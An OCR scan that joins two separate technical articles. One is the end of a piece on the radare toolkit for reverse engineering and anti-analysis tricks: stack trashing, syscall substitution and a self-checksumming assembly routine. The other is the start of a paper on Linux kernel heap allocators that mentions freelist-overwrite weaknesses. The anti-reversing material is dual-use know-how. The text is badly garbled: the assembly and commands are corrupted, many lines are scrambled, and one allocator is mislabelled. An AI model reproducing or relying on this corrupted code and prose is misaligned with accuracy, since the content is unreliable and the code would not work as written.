S echo ’ (syscall-bt,e scr.tee=log.txt,label:,!contsc,!bt,.label:,) \ 
&&.(syscall-bt)’ | radare -d ./a.out 


A way to make the analysis harder is to trash the stack contents with a 
random offset every time we run a syscall. By decreasing the stack pointer 
and later incrementing it we will make the backtrace fail. 


To trash the stack we can just increment the stack before the syscall and 
decrement it after calling it. The analyst will have to patch these inc/dec 
opcodes for every syscall trampolines to get proper backtrace and resolve 
the xrefs for each entry. 


Radare implements a "!contsc" command that makes the debugger stop before 
and after a syscall. This can be scripted together with "!bt" and "!st" to 
get a handmade version of the strace utility. 


Another trick that we can exploit for writing our homebrew packer is to use 
instructions needed to be patched for proper analysis as cipher keys. 
Making the program crash when trying to decipher a section using invalid 
keys for example. 


--[{ 3.7 - Replacing library symbols 


Statically linked binaries are full of unused bytes, we can take use of 
this to inject our code. 


Lot of library symbols (for example from libc) can be directly replaced by 
system calls at the symbol or directly in-place where it is called. For 
example: 


call exit 


can be replaced these (also 5 byte length) instructions: 


xor eax, eax 
inc eax 
int 0x80 


S$ rasm '’xor eax,eaxj;inc eaxj;int 0x80’ 
31 cO 40 cd 80 


This way we can just go into the statified libc’s exit implementation and 
overwrite it with our own code. 


If the binary is statically compiled with stripped symbols we will have to 
look for signatures or directly find the ’int 0x80’ instruction and then 
analyze code backward looking for the beginning of the implementation and 
then find for xrefs to this point. 


14.txt Wed Apr 26 09:43:46 2017 34 


Most compilers append libraries at the end of the binary, so we can easily 
‘draw’ an imaginary line where the program ends and libraries start. 


There’s another tool that may help to identify which libraries and versions 
are embedded in our target program. It is called ’rsc gokolu’. The name 
stands for '’g**gle kode lurker’ and it will look for strings in the given 
program in the famous online code browser and give approximated results of 
the source of the string. 


When we have debugging or symbolic information the process becomes much 
easier and we can directly overwrite the first bytes of the embedded glibc 
code with the small implementation in raw assembly using syscalls. 


rabin is the utility in radare which extracts information from the headers 
of a given program. This is like a multi-architecture multi-platform and 
multi-format '’readelf’ or ‘nm’ replacement which supports ELF32/64, 
PE32/32+, CLASS and MACHO. 


The use of this tool is quite simple and the output is quite clean to ease 
the parsing with sed and other shell tools. 


S$ rabin -vi a.out 


[Imports] 

Memory address File offset Name 
0x08049034 0x00001034 __gmpz_mul_ui 
0x08049044 0x00001044 __cxa_atexit 
0x08049054 0x00001054 memcmp 
0x08049064 0x00001064 pcap_close 
0x08049074 0x00001074 __gmpz_set_ui 


S$ rabin -ve a.out 
[Entrypoint] 
Memory address: 


0x080494d0 


S$ rabin -vs a.out 


[Symbols] 
Memory address File offset Name 
0x0804d86c 0x0000586c CTOR_LIST 
0x0804d874 0x00005874 DTOR_LIST 
Ox0804d87c 0x0000587c JCR_LIST 
0x08049500 0x00001500 __do_global_dtors_aux 
0x0804dae8 0x00005ae8 completed.5703 
0x0804daec 0x00005aec dtor_idx.5705 
0x08049560 0x00001560 frame_dummy 
S$ rabin —-h 
rabin [options] [bin-file] 
-e shows entrypoints one per line 
a0 imports (symbols imported from libraries) 
=S symbols (exports) 
—¢ header checksum 
-S show sections 
-1 linked libraries 
-H header information 
-L [lib] dlopen library and show address 
-Z search for strings in elf non-executable sections 
-x show xrefs of symbols (-s/-i/-z required) 
= show binary info 
= output in radare commands 
-o [str] operation action (str=help for help) 
-v be verbose 


See manpage for more information. 


The same flags can be used for any type of binary for any architecture. 
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Using the -r flag the output will be formatted in radare commands, this way 
you can import the binary information. This command imports the symbols, 
sections, imports and binary information. 


[Ox00000000]> .!!rabin -rsSziI SFILE 


This is done automatically when loading a file if you have file.id=true, if 
you want to disable the analysis run ’radare’ with ’-n’ (because this way 
it will not interpret the ~/.radarerc). 


Programs with symbols or debug information are mostly analyzed by the code 
analysis of ’radare’ thanks to the hints given by ‘’rabin’. So, 
theoretically we will be able to automatically resolve the crossed 
references to functions. But if we are not that lucky we can just setup a 
simple disassembly output format (e asm.profile=simple) and disassemble the 
whole program code grepping for ’call 0x???????’ to resolve calls to our 
desired owned symbol. 


[Ox08049A00]> e scr.color=false 

[Ox08049A00]> e asm.profile=simple 
[OxO08049A00]> s section._text 

[OxO08049A00]> b section._text_end-section._text 
[0Ox08049A00]> pd~call 0x80499e4 

Ox08049fd9 call 0x80499e4 ; imp.exit 
0x0804fa89 call 0x80499e4 ; imp.exit 
0x0805047b call 0x80499e4 ; imp.exit 


[0x08049A00]> 


If we are not lucky and do not have symbols we will have to identify which 
parts of the binary are part of our target binary. 


S rsc syms-dump /lib/libc.so.6 24 > symbols 


--[ 3.8 - Checksumming 


The most common procedure to check for undesired runtime or static program 
patches is done by using checksumming operations over sections, functions, 
code or data blocks. 


These kind of protections are usually easy to patch, but allow the end user 
to get a grateful error message instead of a raw Segmentation Fault. 


The error message string can be a simple entrypoint for the reverser to 
catch the position of the checksumming code. 


Radare offers a hashing command under the "h" char and allows you to 
calculate block-based checksums while debugging or statically by opening 
the file from disk. 


Heres an usage example: 
hmd5 


It is also possible to use these hashing instructions to find pieces of the 
program matching a certain checksum value, or just recalculate the new sum 
to not patch the hash check. 


The ’h’ command can be also performed from the shell by using the "rahash" 
program which permits to calculate multiple checksums for a single file 
based on blocks of bytes. This is commonly used on forensics, when you want 
a checksum to not only give you a boolean reply (if the program has been 
modified), because this way you can reduce the problem on a smaller piece 
of the binary because you have multiple checksums at different offsets for 
the same file. 


This action can be done over hard disks, device firmwares or memory dumps 
of the same size. 
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If you are dealing similar file with deltified contents or you require a 
more fine grained result you should try "radiff" which implements multiple 
bindiffing algorithms that goes from byte level detecting deltas to code 
level diffing using information of basic blocks, variables accessed and 
functions called. 


We will also have to decide a protection method for the checksumming 
algorithm, because this will be the first patch required to enable software 
breakpoints and user defined patches to be done. 


To protect the hasher we just put it distributed along the program by 
mixing its code with the rest of the program making more difficult to 
identify the its position. We can also choose to put this code into a 
ciphered area in .data together with other necessary code to make the 
program run. 


One of the main headaches for reversers is the layering of protections that 
can be represented by lot of entrypoints to the same code making more 
difficult to locate and patch in a proper way. 


The checksumming of a section can be used as a deciphering key for other 

ciphered sections, to avoid easy patching, the program should check for the 
consistence of the deciphered code. This can be done by checking for 
a 
d 


nother checksum or by comparing few bytes at the beginning of the 
eciphered and mmap code. 


ae 


here is another possible design to implement the checksumming algorithm in 
a more flexible way which consists on checksumming the code in runtime 
instead of hardcoding the resulting value somewhere. 


This method allows us to ’protect’ multiple functions without having to 
statically calculate the checksum value of the region. The problem with 
this method is that it doesn’t provide us protection against static 
modifications on the binary. 


This snippet can be compiled with DEBUG=0 to get a fully working 
hecksumming function which returns 0 when the checksum matches. 


Q 


8< 


define CKSUM 0x68 
define FROM 0x8048000 
define SIZE 1024 


str: 
-asciz "Checksum: 0x%08x\n" 


-global cksum 


cksum: 
pusha 
movl SFROM, %esi 
movl SSIZE, %ecx 
xOor %eax, %eax 
ies 
xorb O0(%esi), Sal 
add $1, %esi 
loopnz lb 
#i£ DEBUG 
pushl %eax 
pushl Sstr 
call printf 
addl $8, %esp 
else 
sub SCKSUM, %eax 
jnz 2f 
endif 
popa 


ret 
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#i£ DEBUG 

-global main 

main: 
call cksum; 
ret 

#else 
2: 
mov $20, %eax 
int $0x80 
mov $37, %ebx 
mov $9, %ecx 
xchg %Seax, %ebx 
int $0x80 

#endif 


8< 


[To get the bytes of the function to be pushed we can use an ’rsc’ script that 
dumps the hexpairs contained managed by a symbol in a binary: 


S gcc cksum.S —DDEBUG 
S «sf asGut 
Checksum: 0x69 


S gcc -c cksum.S 

S$ rsc syms-dump cksum.o | grep cksum 

cksum: 60 be 00 80 04 08 b9 00 04 00 00 31 cO 32 06 83 c6 01 e0 £9 2d d2 04 \ 
00 00 75 02 61 c3 b8 14 00 00 00 cd 80 bb 25 00 00 00 b9 09 00 00 00 93 cd 80 


The offsets to patch with our ranged values are: 


+2: original address (4 bytes in little endian) 
+7: size of buffer (4 bytes in little endian) 
+21: checksum byte (1 byte) 


We can use this hexdump from a radare macro that automatically patches the 
correct bytes while inserting the code in the target program. 


S$ rsc syms-dump cksum.o | grep cksum | cut -d : -f 2 > cksum.hex 
S$ cat cksum.macro 
(cksum-init ckaddr size,f ckaddr @ $0,f cksize @ $1,) 
(cksum hexfile size 
# kidnap some 4 opcodes from the function 
f kidnap @ ‘aos 4° 
yt kidnap ckaddr+t+cksize 
wa jmp $$+kidnap @ ckaddrt+cksizet+tkidnap 
wa call ‘?v ckaddr* 
wF SO @ ckaddr 
f cksize @ SSw 
f ckaddr_new @ ckaddr+cksizet50 
wy SS @ ckaddr+2 
wv $1 @ ckaddr+7 
wx ‘hxor $1 @ ckaddr+21 
f ckaddr @ ckaddr_new 


) 


S$ cat cksum.hooks 
0x8048300 
0x8048400 
0x8048800 


S radare -w target 

[0x8048923]> . cksum.macro 

[0x8048923]> .(cksum-init 0x8050300 30) 
[0x8048923]> .(cksum cksum.hex 100) @@. cksum.hooks 


--[ 4 - Playing with code references 
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The relationship between parts of code in the program are a good source of 
information for understanding the dependencies between code blocks, 
functions. 


Following sub-chapters will explain how to generate, retrieve and use the 
code references for retrieving information from a program in memory or 
statically on-disk. 


--[ 4.1 - Finding xrefs 


One of the most interesting information we need when understanding how a 
program works or what it does is the flow graph between functions. This 
give us the big picture of the program and allows us to find faster the 
points of interest. 


There are different ways to obtain this information in radare, but you will 
finally manage it with the ’Cx’ and ’CX’ commands (x=code xref, X=data 
xref). This means that you can even write your own program to extract this 
information and import it into radare by just interpreting the output of 
the program or a file. 


Ox8048000]> !!my-xrefs-analysis a.out > a.out.xrefs 
Ox8048000]> . a.out.xrefs 
Or 

Ox8048000]> .!my-xrefs-analysis a.out 


At the time of writing this, radare implements a basic code analysis 
algorithm that identifies function boundaries, splits basic blocks, finds 
local variables and arguments, tracks their access and also identifies cod 
and data references of individual instructions. 


When /’file.analyze’ is ’true’, this code analysis is done recursively over 
the entrypoint and all the symbols identified by rabin. This means that it 
will not be able to automatically resolve code references following pointer 
tables, register branches and so on and lot of code will remain unanalyzed. 


We can manually force to analyze a function at a certain offset by using 
the ’.afr@addr’ command which will interpret (’.’) the output of the 
command ’afr’ that stands for ’/analyze function recursively’ at (@) a 
certain address (addr). 


When a ’call’ instruction is identified, the code analysis will register a 
code xref from the instruction to the endpoint. This is because compilers 
uses these instructions to call into subroutines or symbols. 


As we did previously, we can disassemble the whole text section looking for 
a ‘call’ instruction and register code xrefs between the source and 
destination address with these two lines: 


[O0x000074E0]> e asm.profile=simple 
[Ox000074E0]> "(xref,Cx ‘pd 1° [2]*)" 
[Ox000074E0]> . (xref) @@=‘pd 100°~call[0] * 


We use the simple asm.profile to make the disassembly text parsing easier. 


The first line will register a macro named ‘xref’ that creates a code xref 
at address pointed by the 3rd word of the disassembled instruction. 


In the second line it will run the previous macro at every offset specified 
by the output of the "pd 100°call[0]" instruction. This is the offset of 
every call instruction of the following 100 instructions. 


When disassembling code (using the ’pd’ command (print disasm)) xrefs will 
be displayed if asm.xrefs is enabled. Optionally, we can set asm.xrefsto to 
visualize the xref information at both end-points of the code referenc 
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--[ 4.2 - Blind code references 


The xrefs(1) program that comes with radare implements a blind code 
reference search algorithm based on identifying sequences of bytes matching 
a certain pattern. 


The pattern is calculated depending on the offset. This way the program 
calculates the relative delta between the current offset and the 
destination address and tries to find relative branches from one point to 
another of the program. 


The current implementation supports x86, arm and powerpc, but allows to 

define templates of branch instructions for other architectures by using 
t 
C 


he option flags to determine the instruction size, endianness, the way to 
alculate the delta, etc. 


The main purpose of this program was to identify code xrefs on big files 
(like firmwares), where the code analysis takes too long or requires many 
manual interaction, it is not designed to identify absolute calls or jumps. 


Here’s an usage example: 


S$ xrefs -a arm bigarmblob.bin 0x6a390 
0x80490 
Ox812c4 


--[ 4.3 - Graphing xrefs 


Radare ships some commands to manage and create interactive graphs to 
display code analysis based on basic blocks, function blocks or whatever we 
want by using the ’gu’ command (graph user) 


The most simple way to use the graphing capabilities is to use the ’ag’ 
command that will directly popup a gtk window with a graphed code analysis 
from the current seek, splitting the code by basic blocks. (use the eval 
graph. jmpblocks and graph.callblocks to split blocks by jumps or calls to 
analyze basic blocks or function blocks). 


The graph is stored internally, but if we want to create our own graphs 
we can use the ’gu’ command which provides subcommands to reset a graph, 
create nodes, edges and display them. 


[Ox08049A00]> gu? 
Usage: gu[dnerv] [args] 


gur user graph reset 

gun SS SSb pd add node 

gue SSF S$S$t add edge 

gud display graph in dot format 
guv visualize user defined graph 


This is a radare script that will generate a graph between analyzed 
function by using the xrefs metadata information. 


After configuring the graph we can display it using the internal viewer 
(guv) or using graphviz’s dot. 


8< 
(xrefs-to from,f XT @ ‘Cx~SO[3]*,)" 
(graph-xrefs-init,gur,)" 
"(graph-xrefs,.(xrefs-to ‘?v $S*),gue SSF XT,)" 
"(graph-viz,gud > dot,!!dot -Tpng -o graph.png dot,!!gqview graph.png,)" 


W 


W 


. (graph-xrefs-—init) 
.(graph-xrefs) @@= ‘Cx [1] * 
. (graph-viz) 

8< 
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Here’s the explanation of the previous script: 


Note that all commands are quoted ’"’ because this way the inner special 
characters are ignored (’>’, ’"'’ ...) 


"(xrefs-to from,f XT @ ‘Cx~$0[3]*,)" 


Register a macro named ’xrefs-to’ that accepts one argument named ’ from’ 
and aliased as $0 inside the macro body. 


The macro executes the ’/f XT’ (create a flag named XT) at (’@’) the 
address where the code xref (Cx) points (3rd column of the row 
matching $0 (the first argument of the macro (from)). 


"(graph-xrefs-init,gur,)" 
The ’graph-xrefs-init’ macro resets the graph user metadata. 
"(graph-xrefs,.(xrefs-to ‘?v $S*),gue SSF XT,)" 
This macro named /graphs-xrefs’ that run commands separated by commas: 
.(xrefs-to ‘?v $$) 
execute the macro ’xrefs-to’ at current seek ($$), the value is 


concatenated to the output of executing ’?v $$’ which evaluates 
the ’SS’ special variable and prints the value in hexadecimal. 


gue XF XT 


Adds an /’/graph-user’ edge between the beginning of the function at 
current seek and XT. 


"(graph-viz,gud > dot,!!dot -Tpng -o graph.png dot,!!rsc view graph.png,)" 
These commands will generate a dot file, render it in png and display it. 

. (graph-xrefs-init) 

.(graph-xrefs) @@= ‘Cx” [1] * 

. (graph-viz) 


Then, we bundle all those macros and the xrefs graph will be displayed 


--[ 4.4 - Randomizing xrefs 


Another annoying low level manipulation we can do is to repeat functions at 
random places with random modifications to make the program code more 
verbose and hard to analyze because of complex control flow paths. 


By doing a cross-references (xrefs) analysis between the symbols we will be 
able to determine which symbols are referenced more from than one single 
point. 


The internal grep syntax can be tricky to retrieve lists of offsets for 
xrefs at a given position. 


[0x0000c830]> Cx 

Cx 0x00000c59 @ 0x00000790 
Cx 0x00000c44 @ 0x000007b0 
Cx 0x00000c35 @ 0x00000810 
Cx 0x00000c26 @ 0x000008a0 


These numbers specify the caller address and the called one. That is: 


Oxc59 -—(calls)-> 0x790 
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To disassemble the opcodes referencing code to other positions we can use the 
‘pd’ command with a foreach statement: 


[0x0000c830]> pd 1 @@= *C*~Cx{[1] * 
This command will run ‘pd 1’ on every address specified in the lst column 


of the output of the ’C*"Cx[1]’ 


-—-[ 5 -— Conclussion 


This article has covered many aspects of revers ngineering, low level 
program manipulation, binary patching/diffing and more, despite being a 
concrete task it has tried to expose a variety of scenarios where a command 
line hexadecimal editor becomes an essential tool. 


Several external scripting languages can be used, don’t care about the 
cryptic scripting of the radare commands, there are APIs for perl, ruby and 
python for controlling radare and analyze code or connect to remote 
radares. 


Being used in batch mod nables the ability to automatize many analysis 
tasks, generate graphs of code, determine if it is packed or infected, find 
vulnerabilities, etc. 


Maybe the more important characteristic of this software is the abstraction 
of the IO which allows you to open hard disk images, serial connections, 
process memory, haret wince devices, gdb-enabled applications like bochs, 
vmware, qemu, shared memory areas, winedbg and more. 


There are lot of things we have not covered in this article but the main 
concepts have been exposed while explaining multiple protection techniques 
for binaries. 


Using scriptable tools for implementing binary protection techniques eases 
the development and permits to recycle and accelerate the analysis and 
manipulation of files. 


--[ 6 - Future work 
The project was born in 2006, and it has grown pretty fast. 


At the moment of writing this paper the development is done on two 
different branches: radare and radare2. 


[The second one is a complete refactoring of the original code aiming to 
reimplement all the features of the radare framework into multiple 
libraries. 

This design permits to bypass some limitations of the design of rl enabling 
full scripting support for specific or composed set of libraries. Each 
module extends its functionalities into plugins. 


While using parrot as a virtual machine, multiple scripting languages can 
be used together. Being scripting language agnostic enables the possibility 
to mix multiple frameworks together (like metasploit [5], ERESI [6], etc) 


The modular design based on libraries, plugins and scripts will open new 
ways to extend the framework by third party developers and additionally 
make the code much more maintainable and bugfree. 


New applications will appear on top of the r2 set of libraries, there ar 
some projects aiming to integrate it from web frontends and graphical 
frontends. 


Plugins extend the modules adding support for new architectures, binary 


14.txt Wed Apr 26 09:43:46 2017 42 


formats, code analysis modules, debugging backends, remote protocols, 
scripting facilities and more. 


At the moment of writing this, radare2 (aka libr) is actually under 
development but implements some test programs that try to reimplement th 
applications distributed with radare. 
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ELinux and the audit subsystem 


and background of the Linux kernel heap allocators 


Before discussing what is KERNHEAP, its internals and design, we will have 


a glance at the background and 


history of Linux kernel heap allocators. 


In 1994, Jeff Bonwick from Sun Microsystems presented the SunOS 5.4 
kernel heap allocator at USENIX Summer [1]. This allocator produced higher 
performance results thanks to its use of caches to hold invariable state 


information about the objects, 


and reduced fragmentation significantly, 


grouping similar objects together in caches. When memory was under stress, 


the allocator could check th 


caches for unused objects and let the system 


reclaim the memory (that is, shrinking the caches on demand). 


We will refer to these units composing the caches a 


comprises contiguous pages of memory. 
(objects or buffers) of the same size. This minimizes 


fragmentation, 


s "slabs". A slab 


Each page in the slab holds chunks 
internal 


since a slab will only contain same-sized chunks, and 
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only the /’trailing’ or free space in the page will be wasted, until it 
is required for a new allocation. The following diagram shows the 
layout of Bonwick’s slab allocator: 


CACHE 
CAGHE: (5 = EMPTY 
PARTIAT. ()->==\|. (SLAB: [= -a SS PAGE (objects) 
FULL eer [eee ssa CHUNK 
CHUNK 
CHUNK 


These caches operated in a LIFO manner: when an allocation was requested 
for a given size, the allocator would seek for the first available free 
object in the appropriate slab. This saved the cost of page allocation 
and creation of the object altogether. 


"A slab consists of one or more pages of virtually contiguous 
memory carved up into equal-size chunks, with a reference count 
indicating how many of those chunks have been allocated." 

Page 5, 3.2 Slabs. [1] 


Each slab was managed with a kmem_slab structure, which contained its 
reference count, freelist of chunks and linkage to the associated 
kmem_cache. Each chunk had a header defined as the kmem_bufctl (chunks 
are commonly referred to as buffers in the paper and implementation), 
which contained the freelist linkage, address to the buffer anda 
pointer to the slab it belongs to. The following diagram shows the 
layout of a slab: 


| SLAB (kmem_slab) | 


N 1 ve 
T 


/ \ 


bufctl bufctl 


, , 


| | ':>=jJJ6XKNM 
buffer | buffer | Unused XQNM 
| | ':>=jJ6XKNM 


Page (s) 


For chunk sizes smaller than 1/8 of a page (ex. 512 bytes for x86), the 
meta-data of the slab is contained within the page, at the very end. 
The rest of space is then divided in equally sized chunks. Because all 
buffers have the same size, only linkage information is required, 
allowing the rest of values to be computed at runtime, saving space. 
The freelist pointer is stored at the end of the chunk. Bonwick 

states that this due to end of data structures being less active than 
the beginning, and permitting debugging to work even when an 
use-after-free situation has occurred, overwriting data in the buffer, 
relying on the freelist pointer being intact. In deliberate attack 
scenarios this is obviously a flawed assumption. An additional word was 
reserved too to hold a pointer to state information used by objects 
initialized through a constructor. 


For larger allocations, the meta-data resides out of the page. 
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The freelist management was simple: each cache maintained a circular 
doubly-linked list sorted to put the empty slabs (all buffers 
allocated) first, the partial slabs (free and allocated buffers) and 
finally the full slabs (reference counter set to zero, all buffers 
free). The cache freelist pointer points to the first non-empty slab, 
and each slab then contains its own freelist. Bonwick chose this 
approach to simplify the memory reclaiming process. 


The process of reclaiming memory started at the original 
kmem_cache_free() function, which verified the reference counter. If 
its value was zero (all buffers free), it moved the full slab to the 
tail of the freelist with the rest of full slabs. Section 4 explains 
the intrinsic details of hardware cache sid ffects and optimization. 
It is an interesting read due to the hardware used at the time the 
paper was written. In order to optimize cache utilization and bus 
balance, Bonwick devised ’slab coloring’. Slab coloring is simple: when 
a slab is created, the buffer address starts at a different offset 
(referred to as the color) from the slab base (since a slab is an 
allocated page or pages, this is always aligned to page size). 


It is interesting to note that Bonwick already studied different 
approaches to detect kernel heap corruption, and implemented them in 
the SunOS 5.4 kernel, possibly predating every other kernel in terms of 
heap corruption detection). Furthermore, Bonwick noted the performance 
impact of these features was minimal. 


"Programming errors that corrupt the kernel heap such as 

modifying freed memory, freeing a buffer twice, freeing an 

uninitialized pointer, or writing beyond the end of a buffer 4\200\224 are 
often difficult to debug. Fortunately, a thoroughly instrumented 

ker- nel memory allocator can detect many of these problems." 

page 10, 6. Debugging features. [1] 


The audit mode enabled storage of the user of every allocation (an 
equivalent of the Linux feature that will be briefly described in 
the allocator subsections) and provided these traces when corruption 
was detected. 


Invalid free pointers were detected using a hash lookup in the 
kmem_cache_free() function. Once an object was freed, and after the 
destructor was called, it filled the space with Oxdeadbeef. Once this 
object was being allocated again, the pattern would be verified to see 
that no modifications occurred (that is, detection of use-after-free 
conditions, or write-after-fr more specifically). Allocated objects 
were filled with Oxbaddcafe, which marked it as uninitialized. 


Redzone checking was also implemented to detect overwrites past the end 
of an object, adding a guard value at that position. This was verified 
upon free. 


Finally, a simple but possibly effective approach to detect memory 
leaks used the timestamps from the audit log to find allocations which 
had been online for a suspiciously long time. In modern times, this 
could be implemented using a kernel thread. SunOS did it from userland 
via /dev/kmem, which would be unacceptable in security terms. 


For more information about the concepts of slab allocation, refer to 
Bonwick’s paper at [1] provides an in-depth overview of the theory and 
implementation. 


—--[ 1:1. SLAB 


The SLAB allocator in Linux (mm/slab.c) was written by Mark Hemment 

in 1996-1997, and further improved through the years by Manfred 

Spraul and others. The design follows closely that presented by Bonwick for 
his Solaris allocator. It was first integrated in the 2.2 series. 

This subsection will avoid describing more theory than the strictly 
necessary, but those interested on a more in-depth overview of SLAB 
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can refer to "Understanding the Linux Virtual Memory Manager" by 
Mel Gorman, and its eighth chapter "Slab Allocator" [X]. 


The caches are defin 


(most commonly) page 
Each cache holds its 
(2%n), the number of 
and range, a pointer 
and linkage to other 


information. 


das a kmem_cache structure, comprised of 
sized slabs, containing initialized objects. 
own GFP flags, the order of pages per slab 


objects (chunks) 


per slab, coloring offsets 


to a constructor function, a printable name 
caches. Optionally, if enabled, it can define 
a set of fields to hold statistics an debugging related 


struct kmem_list3 { 


struct list_head sl] 


struct list_head slabs_full; 
struct list_head slabs_free; 
unsigned long free_objects; 


unsigned int 
unsigned int 


free_limit; 
colour_next; 


unsigned long next_reap; 
int free_touched; 


}; 


These structures are 


Each kmem_cache has an array of kmem_list3 structures, which contain 


the information about partial, full and free slab lists: 


labs_partial; 


initialized with kmem_list3_init(), setting 


drain_freelist() function, 


released, initiated via cache_reap(). 
slab_destroy(), and allocated with the cache_grow() function for a 
given NUMA node, flags and cache. 


The cache contains the doubly-] 


all the reference counters to zero and preparing the list3 to be 
linked to its respective cache nodelists list for the proper NUMA 
node. This can be found in cpuup_prepare() and kmem_cache_init(). 


The "reaping" or draining of the cache free lists is done with the 
which returns the total number of slabs 


A slab is released using 


linked lists for the partial, full 


and free lists, and a free object count in free_objects. 


A slab is defined with the foll 


struct slab { 


struct list_head list; hu 
unsigned long colouroff; [* 
void *s_mem; 

unsigned int inuse; 
kmem_bufctl_t free; es 
unsigned short nodeid; f% 


}; 


lowing structure: 


linkage/pointer to freelist */ 
color / offset */ 
/* start address of first object */ 
/* num of objs active in slab */ 
first free chunk (or none) */ 
NUMA node id for nodelists */ 


The list member points to the freelist the slab belongs to: 


partial, full or empty. 


The s_mem is used to calculate the address 


to a specific object with the color offset. Free holds the list of 
objects. The cache of the slab is tracked in the page structure. 


The functions used to retrieve the cache a potential object belongs 


to is virt_to_cache(), 
page structure pointer. 


which itself relies on page_get_cache() ona 


It checks that the Slab page flag is set, 


and takes the lru.next pointer of the head page (to be compatible 
this is no different for normal pages). The 


with compound pages, 


cache is set with page_set_cache(). 


The behavior to assign pages to 


a slab and cache can be seen in slab_map_pages(). 


The internal function used for cache shrinking is __cache_shrink(), 


called from kmem_cache_shrink () 


and during cache destruction. SLAB 


is clearly poor at the scalability side: on NUMA systems with a 
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large number of nodes, substantial time will be spent on walking 
the nodelists, drain each freelist, and so forth. In the process, 
it is most likely that some of those nodes won’t be under memory 
pressure. 


slab management data is stored inside the slab itself when the siz 
is under 1/8 of PAGE_SIZE (512 bytes for x86, same as Bonwick’s 
allocator). This is done by alloc_slabmgmt(), which either stores 
the management structure within the slab, or allocates space for it 
from the kmalloc caches (slabp_cache within the kmem_cache 
structure, assigned with kmem_find_general_cachep() given the slab 
size). Again, this is reflected in slab_destroy() which takes care 
of freeing the off-slab management structure when applicable. 


The interesting security impact of this logic in managing control 
structures is that slabs with their meta-data stored off-slab, in 
one of the general kmalloc caches, will be exposed to potential 
abuse (ex. in a slab overflow scenario in some adjacent object, the 
freelist pointer could be overwritten to leverage a 
write4-primitive during unlinking). This is one of the loopholes 
which KERNHEAP, as described in this paper, will close or at very 
least do everything feasible to deter reliabl xploitation. 


Since the basic technical aspects of the SLAB allocator are now 
covered, the reader can refer to mm/slab.c in any current kernel 
release for further information. 


1.2 SLOB 


Released in November 2005, it was developed since 2003 by Matt Mackall 
for use in embedded systems due to its smaller memory footprint. It 
lacks the complexity of all other allocators. 


The granularity of the SLOB allocator supports objects as little as 2 
bytes in size, though this is subject to architecture-dependent 
restrictions (alignment, etc). The author notes that this will 
normally be 4 bytes for 32-bit architectures, and 8 bytes on 64-bit. 


[The chunks (referred as blocks in his comments at mm/slob.c) are 
referenced from a singly-linked list within each page. His approach to 
reduce fragmentation is to place all objects within three distinctive 
lists: under 256 bytes, under 1024 bytes and then any other objects 

of size greater than 1024 bytes. 


The allocation algorithm is a classic next-fit, returning the first 
slab containing enough chunks to hold the object. Released objects are 
re-introduced into the freelist in address order. 


The kmalloc and kfree layer (that is, the public API exposed from 
SLOB) places a 4 byte header in objects within page size, or uses the 
lower level page allocator directly if greater in size to allocate 
compound pages. In such cases, it stores the size in the page 
structure (in page->private). This poses a problem when detecting the 
size of an allocated object, since essentially the slob_page and 

page structures are the same: it’s an union and the values of the 
structure members overlap. Size is enforced to match, but using the 
wrong place to store a custom value means a corrupted page stat 


Before put_page() or free_pages(), SLOB clears the Slob bit, resets 
the mapcount atomically and sets the mapping to NULL, then the page 
is released back to the low-level page allocator. This prevents the 
overlapping fields from leading to the aforementioned corrupted 
state situation. This hack allows both SLOB and the page 

allocator meta-data to coexist, allowing a lower memory footprint 
and overhead. 


1.3 SLUB aka The Unqueued Allocator 


15.txt 


Wed Apr 26 09:43:46 2017 6 


The default allocator in several GNU/Linux distributions at the 


moment, including Ubuntu and Fedora. It was developed by 


al 


Christopher Lameter and merged into th mm tr in early 2007. 


"SLUB is a slab allocator that minimizes cache line usage 
instead of managing queues of cached objects (SLAB approach). 
Per cpu caching is realized using slabs of objects instead of 
queues of objects. SLUB can use memory efficiently and has 
enhanced diagnostics." CONFIG_SLUB documentation, Linux kernel. 


The SLUB allocator was the first introducing merging, the concept 
of grouping slabs of similar properties together, reducing the 
number of caches present in the system and internal fragmentation. 


This, however, has detrimental security side effects which are 
explained in section 3.1. Fortunately even without a patched 
kernel, merging can be disabled on runtime. 


The debugging facilities are far more flexible than those in SLAB. 
They can be enabled on runtime using a boot command line option, 
and per-cache. 


DMA caches are created on demand, or not-created at all if support 
isn’t required. 


Another important change is the lack of SLAB’s per-node partial 
ists. SLUB has a single partial list, which prevents partially 
ree-allocated slabs from being scattered around, reducing 
nternal fragmentation in such cases, since otherwise those nod 
ocal lists would only be filled when allocations happen in that 
particular node. 


Dh 


Its cache reaping has better performance than SLAB’s, especially on 
SMP systems, where it scales better. It does not require walking 
the lists every time a slab is to be pushed into the partial list. 
For non-SMP systems it doesn’t use reaping at all. 


Meta-data is stored using the page structure, instead of withing 
the beginning of each slab, allowing better data alignment and 
again, this reduces internal fragmentation since objects can be 
packed tightly together without leaving unused trailing space in 
the page(s). Memory requirements to hold control structures is much 
lower than SLAB’s, as Lameter explains: 


"SLAB Object queues exist per node, per CPU. The alien cache 
queue even has a queue array that contain a queue for each 
processor on each node. For very large systems the number of 
queues and the number of objects that may be caught in those 
queues grows exponentially. On our systems with 1k nodes / 
processors we have several gigabytes just tied up for storing 
references to objects for those queues This does not include 
the objects that could be on those queues." 


To sum it up in a single paragraph: SLUB is a clever allocator 
which is designed for modern systems, to scale well, work reliably 
in SMP environments and reduce memory footprint of control and 
meta-data structures and internal/external fragmentation. This 
makes SLUB the best current target for KERNHEAP development. 


1.4 SLOB 


The SLOB allocator was developed by Nick Piggin to provide better 

scalability and avoid fragmentation as much as possible. It makes a 
great deal of an effort to avoid allocation of compound pages, 
W 
p 


hich is optimal when memory starts running low. Overall, it isa 
er-CPU allocator. 


The structures used to define the caches are slightly different, 
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and it shows that the allocator has been to designed from ground 
zero to scale on high-end systems. It tries to optimize remote 
freeing situations (when an object is freed in a different node/CPU 
than it was allocated at). This is relevant to NUMA environments, 
mostly. Objects more likely to be subjected to this situation are 
long-lived ones, on systems with large numbers of processors. 


It defines a slqb_page structure which "overloads" the lower level 
page structure, in the same fashion as SLOB does. Instead of an 
unused padding, it introduces kmem_cache_list ad freelist pointers. 


For each lookaside cache, each CPU has a LIFO list of the objects 
local to that node (used for local allocation and freeing), a free 
and partial pages lists, a queue for objects being freed remotely 
and a queue of already free objects that come from other CPUs remote 
free queues. Locking is minimal, but sufficient to control 

cross-CPU access to these queues. 


Some of the debugging facilities include tracking the user of the 
allocated object (storing the caller address, cpu, pid and the 
timestamp). This track structure is stored within the allocated 
object space, which makes it subject to partial or full overwrites, 
thus unsuitable for security purposes like similar facilities in 
other allocators (SLAB and SLUB, since SLOB is impaired for 
debugging). 


Back on SLOB-specific changes, the use of a kmem_cache_cpu 
